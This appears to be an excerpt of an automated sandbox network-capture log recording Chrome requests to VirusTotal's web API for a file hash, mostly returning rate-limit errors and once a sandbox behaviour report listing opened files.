                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    237192.168.2.164999674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:01 UTC597OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?relationships=owner%2Cviewers%2Ceditors HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:01 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: a18aede2709ca85ac53ba13ee66619ef
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:01 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:01 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    238192.168.2.164999774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:01 UTC617OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:01 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 3b15b2c0106123f7bd1a62eb316013ff
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:01 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:01 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    239192.168.2.164999874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:01 UTC693OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files?limit=10&cursor=MTB8fHYzfHwxNzE0MDc0OTU4fHw5NDU0YmQ1YzIwNWM4NTFhYWE4MDI1ZTc4NjY4YzBjYWZjZjNhZmY3N2QzYjY5ZGJiZjU0YWYyZmI5OWIzNWI5 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:01 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: cf7d4e36120837160a4f84581e291fcd
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:01 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:01 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    240192.168.2.164999974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:04 UTC963OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTI0NTEwODU2NjUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTYzLjQ0NA==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 6ec761a4fbbff584feb0edb1e4153187
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:05 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:05 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 73 73 75 65 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 4e 22 3a 20 22 52 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 22 3a 20 22 55 53 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 72 69 61 6c 5f 6e 75 6d 62 65 72 22 3a 20 22 30 33 37 35 63 62 65 65 66 66 39 37 36 63 62 31 30 32 64 63 63 61 39 34 30 63 39 61 31 66 32 66 36 62 34 63 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: }, "issuer": { "CN": "R3", "C": "US" }, "serial_number": "0375cbeeff976cb102dcca940c9a1f2f6b4c",
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC545INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 42 30 30 30 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 42 30 30 30 31 2e 30 30 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 42 30 30 30 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "id": "B0001" }, { "id": "B0001.009" }, { "id": "B0002" }, {
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 43 30 30 30 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 43 30 30 30 35 2e 30 30 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4f 42 30 30 30 37 22 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: }, { "id": "C0002" }, { "id": "C0005.001" }, { "id": "OB0007"
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC1408INData Raw: 22 3a 20 22 4f 43 30 30 30 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 43 30 30 33 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 6c 65 73 5f 6f 70 65 6e 65 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 6b 65 72 6e 65 6c 2e 61 70 70 63 6f 72 65 2e 64 6c 6c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: ": "OC0008" }, { "id": "C0036" } ], "files_opened": [ "C:\\Windows\\System32\\kernel.appcore.dll",
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC1280INData Raw: 41 46 33 34 2d 43 36 34 37 45 33 37 43 41 30 44 39 7d 2e 31 2e 76 65 72 30 78 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 37 2e 64 62 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 25 41 70 70 44 61 74 61 25 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 74 61 72 74 20 4d 65 6e 75 5c 5c 50 72 6f 67 72 61 6d 73 5c 5c 57 69 6e 64 6f 77 73 20 50 6f 77 65 72 53 68 65 6c 6c 5c 5c 57 69 6e 64 6f 77 73 20 50 6f 77 65 72 53 68 65 6c 6c 2e 6c 6e 6b 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 64 65 73 6b 74 6f 70 2e 69 6e 69 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 55 73 65 72
                                                                                                                                                                                                                    Data Ascii: AF34-C647E37CA0D9}.1.ver0x0000000000000027.db", "C:\\Windows\\%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk", "C:\\Users\\desktop.ini", "C:\\User
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC1408INData Raw: 62 38 62 7d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 5c 3f 3f 5c 5c 53 54 4f 52 41 47 45 23 56 6f 6c 75 6d 65 23 7b 64 31 36 65 32 31 35 63 2d 63 62 39 39 2d 31 31 65 65 2d 39 61 61 64 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 23 30 30 30 30 30 30 30 39 45 30 31 30 30 30 30 30 23 7b 35 33 66 35 36 33 30 64 2d 62 36 62 66 2d 31 31 64 30 2d 39 34 66 32 2d 30 30 61 30 63 39 31 65 66 62 38 62 7d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 52 6f 61 6d 69 6e 67 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 74 61 72 74 20 4d 65 6e 75 5c 5c 50 72 6f 67 72 61 6d 73 5c 5c 57 69 6e 64 6f 77 73 20 50
                                                                                                                                                                                                                    Data Ascii: b8b}", "\\??\\STORAGE#Volume#{d16e215c-cb99-11ee-9aad-806e6f6e6963}#00000009E0100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}", "C:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows P
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC1408INData Raw: 64 6f 77 73 5c 5c 53 74 61 72 74 20 4d 65 6e 75 5c 5c 50 72 6f 67 72 61 6d 73 5c 5c 57 69 6e 64 6f 77 73 20 50 6f 77 65 72 53 68 65 6c 6c 5c 5c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 5c 76 31 2e 30 5c 5c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 77 69 6e 64 6f 77 73 70
                                                                                                                                                                                                                    Data Ascii: dows\\Start Menu\\Programs\\Windows PowerShell\\", "C:\\Windows\\System32\\windowspowershell\\v1.0\\", "C:\\Windows", "C:\\Windows\\System32", "C:\\Windows\\System32\\windowsp
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC1280INData Raw: 2e 33 30 33 31 39 5c 5c 43 6f 6e 66 69 67 5c 5c 6d 61 63 68 69 6e 65 2e 63 6f 6e 66 69 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 4d 69 63 72 6f 73 6f 66 74 2e 4e 45 54 5c 5c 46 72 61 6d 65 77 6f 72 6b 36 34 5c 5c 76 34 2e 30 2e 33 30 33 31 39 5c 5c 66 75 73 69 6f 6e 2e 6c 6f 63 61 6c 67 61 63 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 43 4c 52 5f 76 34 2e 30 5c 5c 55 73 61 67 65 4c 6f 67 73 5c 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 2e 6c 6f 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                                                                    Data Ascii: .30319\\Config\\machine.config", "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\fusion.localgac", "C:\\Users\\<USER>\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log", "
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC1408INData Raw: 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 76 65 72 73 69 6f 6e 2e 64 6c 6c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 67 70 61 70 69 2e 64 6c 6c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 63 69 2e 64 6c 6c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 64 6e 73 61
                                                                                                                                                                                                                    Data Ascii: Windows\\System32\\version.dll", "C:\\Windows\\System32\\gpapi.dll", "C:\\Users\\<USER>\\AppData\\Local\\Temp\\", "C:\\Windows\\System32\\ci.dll", "C:\\Windows\\System32\\dnsa


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    241192.168.2.165000074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:05 UTC570OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:06 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: bda38f4490034f0b96804aa3b288a41b
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:06 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:06 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    242192.168.2.165000174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:09 UTC963OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
